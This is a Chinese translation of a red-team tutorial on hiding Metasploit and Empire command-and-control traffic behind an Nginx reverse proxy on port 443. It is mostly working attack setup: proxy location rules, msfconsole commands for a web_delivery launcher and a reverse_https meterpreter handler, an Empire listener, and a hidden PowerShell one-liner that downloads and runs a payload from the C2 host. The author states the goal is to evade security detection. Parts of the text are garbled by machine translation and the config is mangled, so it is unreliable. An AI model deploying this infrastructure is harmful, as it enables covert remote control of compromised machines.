http服务工具(http抓包工具)

翻译： WisFree

估计稿费： 200RMB (不服你也来投稿啊！ ）

投稿方式：向linwei#360.cn发送邮件或登录网络版在线投稿

基础知识

目前，大多数常用的命令控制(CC )工具，如Metasploit和Empire，用于通过HTTP传输网络通信数据。 对CC工具来说，HTTP协议之所以是更高效的选择，主要是因为它适用于当前的任何类型的通信网络和网络设备。 此外，使用" HTTP over TLS "可以将安全层添加到这些工具中，因为很难发现抄送流量。 如果企业或组织具有正确配置的Web代理，则可以执行SSL/TLS检查的代理可以帮助安全技术人员更好地发现抄送流量。 但是，在我协助测试的组织中，采取这种安全措施的组织不多。

为了覆盖所有非法操作，通过HTTP协议传输的CC流量必须在80端口或443端口上发送。 使用特殊端口(如8080 )发送CC数据，不仅会引起管理员的怀疑，而且无法避免安全软件的发现。 我个人喜欢在同一台主机上使用多种类型的工具。 如果在一台主机上同时使用Empire和Metasploit网络传输模块，则总共需要三个网络端口。 通常，选择使用80端口、8080端口和443端口。 但是我现在想通过端口443发送所有的网络流量。 因此，现在就可以使用SwordShield提供的安全分析服务，在一个CC代理上完成所有分析操作。

接下来，我们打算使用Nginx构建反向代理服务器。 可以使用一个Web服务同时处理多用户-多工具情况，如下图所示。 代理服务器配置完成后，代理规则负责划分发送到C2服务器端口的通信。 此外，在这种配置中，还可以隐藏CC服务的“真实身份”(实际主机)。 Nginx不仅安装和配置非常简单，而且操作也非常方便。 多用户-多工具抄送代理体系结构如下图所示。

安装和配置Nginx

首先，在VPS服务器上安装您喜欢的Linux发行版。 如果需要，也可以安装在自己的服务器上。 为了清楚起见，我们决定在VPS主机上安装Ubuntu 16.10。 如果您在安装和运行Nginx方面遇到困难，请参见本教程[获取教程]。 配置后，只启用了80个端口的服务，并且只通过443个端口发送网络通信。

在开始测试之前，必须设置Nginx。 如果不进行设置，代理服务器将不知道如何处理这些通信连接。 为了防止暴力破解攻击，我们必须给每个分析器分配一个GUID。 单击此处可以生成相应的GUID。 我生成的GUID如下表所示。

我总共设置了三个分析器。 有关每个分析器的配置信息如下：

1234567891011213141516171920212223242528293031323334338340414244547484950555657 # analyst1location/analyst1location/al Empire location/e 0922 bb0-684 B- 4ed3- 967 e-85d 08880 cf D5/e/{ proxy _ pass https://205.232.71.92:43； } # metasploit location/e 0922 bb0- 684 B- 4ed3- 967 e-85d 08880 cf D5/m/{ # metasploit exploit/multi/script/web _ deld } } # metasploitpayloadwindows/x64/meter preter/reverse _ https location/e 0922 bb0- 684 B- 4ed3- 967 e-85d 08880 cf D5/m # Empire location/30061 CD8-0 CEE-4381-B3 F8 -

B50DCACA4CC8/e/ { proxy_pass https://1.2.3.5:443; } #Metasploit location /30061CD8-0CEE-4381-B3F8-B50DCACA4CC8/m/ { #Metasploit exploit/multi/script/web_delivery location /30061CD8-0CEE-4381-B3F8-B50DCACA4CC8/m/Delivery { proxy_pass https://1.2.3.5:8080; } #Metasploit Payload windows/x64/meterpreter/reverse_https location /30061CD8-0CEE-4381-B3F8-B50DCACA4CC8/m/Pwned { proxy_pass https://1.2.3.5:80; } }}#Analyst 3location /6012A46E-C00C-4816-9DEB-7B2697667D92/ { proxy_redirect off; #Empire location /6012A46E-C00C-4816-9DEB-7B2697667D92/e/ { proxy_pass https://1.2.3.6:443; } #Metasploit location /6012A46E-C00C-4816-9DEB-7B2697667D92/m/ { #Metasploit exploit/multi/script/web_delivery location /6012A46E-C00C-4816-9DEB-7B2697667D92/m/Delivery { proxy_pass https://1.2.3.6:8080; } #Metasploit Payload windows/x64/meterpreter/reverse_https location /6012A46E-C00C-4816-9DEB-7B2697667D92/m/Pwned { proxy_pass https://1.2.3.6:80; } }}

由于我们要让Nginx需要区分出Metasploit和Empire的请求，所以我突发奇想，打算用‘m’来代表Metasploit，用‘e’来代表Empire。Empire的C2请求如下所示：

1https://myc2proxy.com/E0922BB0-684B-4ED3-967E-85D08880CFD5/e/index.asp

现在，既然我们已经可以确定传入的HTTP请求所使用的语句了，那么Nginx就需要将每一个请求转发至适当的分析代理服务器中，这项操作可以使用Nginx配置文件（/etc/nginx/sites-enabled/default）中的定位指令来完成。在这篇文章中，我们要为每一个分析器分别设置四个定位指令。在上面这段代码中，最外层的指令将会与分析器的GUID进行匹配。内层的定位指令主要用来匹配针对特定工具的请求，例如‘e’（Empire）和‘m’（Metasploit）。Metasploit的定位指令包含两个子定位指令，这两个指令可以用来匹配传入Metasploit特定模块和监听器的网络请求。

现在，C&C代理服务器应该配置完成并且可以正常运行了。如果配置无误的话，我们将只能使用TLS连接和端口443来与服务器进行通信。

Metasploit的安装与配置

众所周知，Metasploit提供了很多的功能模块，我们可以使用这些模块来与目标用户的计算机建立C2连接。我个人比较喜欢使用“exploit/multi/script/web_delivery”模块来作为launcher。我之所以非常喜欢这个模块，主要是因为它可以将meterpreter（ShellCode）注入至目标主机的内存中。这是一种非常理想的情况，因为你可以直接使用目标主机中的内置工具来进行操作，而不必向目标主机发送任何的文件。

接下来，我们要加载Nginx配置文件所需要使用的Metasploit模块，并使用URIPATH来对其进行设置。需要注意的是，自带的payload handler必须被禁用，因为我们要单独配置这些payload。在配置这个模块的过程中，payload使用的是“windows/x64/meterpreter/reverse_https”，然后将LHOST和LPORT设置为C2代理服务器的IP地址和端口号。请注意，这里可千万不要设置成后台C2服务器的IP地址了。除此之外，我们还要设置与payload（例如Pwned）和Nginx中的指令相匹配的LURI。虽然相应的监听器根本不会启动，但我们仍然要去配置这些payload。因为接下来当模块被执行之后，我们要使用这些设置来生成显示在屏幕中的启动命令。我们可以将下面给出的这段指令直接复制粘贴到msfconsole中来配置并启动该模块：

12345678910use exploit/multi/script/web_deliveryset URIPATH /E0922BB0-684B-4ED3-967E-85D08880CFD5/m/Deliveryset DisablePayloadHandler trueset SSL Trueset TARGET 2set payload windows/x64/meterpreter/reverse_httpsset LHOST myc2proxy.comset LPORT 443set LURI /E0922BB0-684B-4ED3-967E-85D08880CFD5/m/Pwnedrun –j

下图显示的是Metasploit中web_delivery模块的配置信息：

当模块被执行后，屏幕中会显示一个包含有启动代码的字符串。请注意：必须将网络端口由8080改为443，否则之后将无法再进行修改了。除此之外，我们还必须手动去修改，因为我们的C2代理只会接受来自端口443的通信请求。这个字符串如下所示：

1powershell.exe -nop -w hidden -c [System.Net.ServicePointManager]::ServerCertificateValidatiOnCallback={$true};$o=new-object net.webclient;$o.proxy=[Net.WebRequest]::GetSystemWebProxy();$o.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $o.downloadstring('https://myc2proxy.com:8080/E0922BB0-684B-4ED3-967E-85D08880CFD5/m/Delivery');

接下来，将LHOST设置为0.0.0.0，LPORT设置为80（端口号的设置可以根据后台C2服务器来选择）。我们还需要配置OverrideLHOST、OverrideLPORT、以及OverrideRequestHost来确保payload可以直接与C2代理服务器进行对话。我们可以将下面给出的命令直接复制粘贴到msfconsole中来配置并启动该模块：

12345678910use exploit/multi/handlerset payload windows/x64/meterpreter/reverse_httpsset LHOST 0.0.0.0set LPORT 80set LURI /E0922BB0-684B-4ED3-967E-85D08880CFD5/m/Pwnedset OverrideLHOST myc2proxy.comset OverrideLPORT 443set OverrideRequestHost trueset ExitOnSession falserun –j

下图显示的是reverse_https的payload配置信息：

Empire的安装与配置

虽然Empire是我最喜欢的一款工具，但是在配置代理服务器的过程中，使用Empire之前还是有几个障碍需要克服的，相比之下Metasploit的配置和使用就简单多了。在PowerShell v1中，初始链接序列所使用STAGE0、STAGE1和STAGE2是在empire.db的配置表中定义的。在我看来，我们是无法在Empire CLI中修改这部分数据的，所以我们必须直接手动修改数据库。但是，PowerShell Empire v2并没有使用这种架构。我建议各位同学使用git来下载Empire v2分支，命令如下：

1cd /opt;git clone -b 2.0_beta https://github.com/adaptivethreat/Empire.git

下载完成之后，启动应用。由于Empire监听器所使用的端口必须与C2代理服务器的监听端口相同，所以Empire必须使用端口443和HTTPS协议。我们可以直接将下面给出的这段命令复制粘贴进Empire中来配置监听器：

123456789listenersuselistener httpset DefaultProfile /E0922BB0-684B-4ED3-967E-85D08880CFD5/e/admin/get.php,/E0922BB0-684B-4ED3-967E-85D08880CFD5/e/news.asp,/E0922BB0-684B-4ED3-967E-85D08880CFD5/e/login/process.jsp|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0;rv:11.0) like Geckoset Name EmpireC2set CertPath /opt/Empire/data/empire.pemset Host https://myc2proxy.comset Port 443executelauncher powershell

Empire监听器的配置信息如下图所示：

执行

现在，我们已经为Nginx C2代理配置好了一个用于分析数据流量的后台C2服务器了。接下来，我们要在测试主机中执行我们所生成的其中一个launcher，你将会在后台C2服务器中看到测试主机的shell。为了增加安全措施，配置后台C2服务器只允许当前C2代理访问。

结论

代理可以用来保持后台服务的匿名性。暴躁的酒窝需要在某个网络中进行命令控制活动时，代理所提供的这种特性是非常有用的。由于HTTPS的通信数据足够安全，因此现在越来越多的网络都开始使用HTTPS来进行通信了。但是，这也将有助于我们躲避安全产品的检测。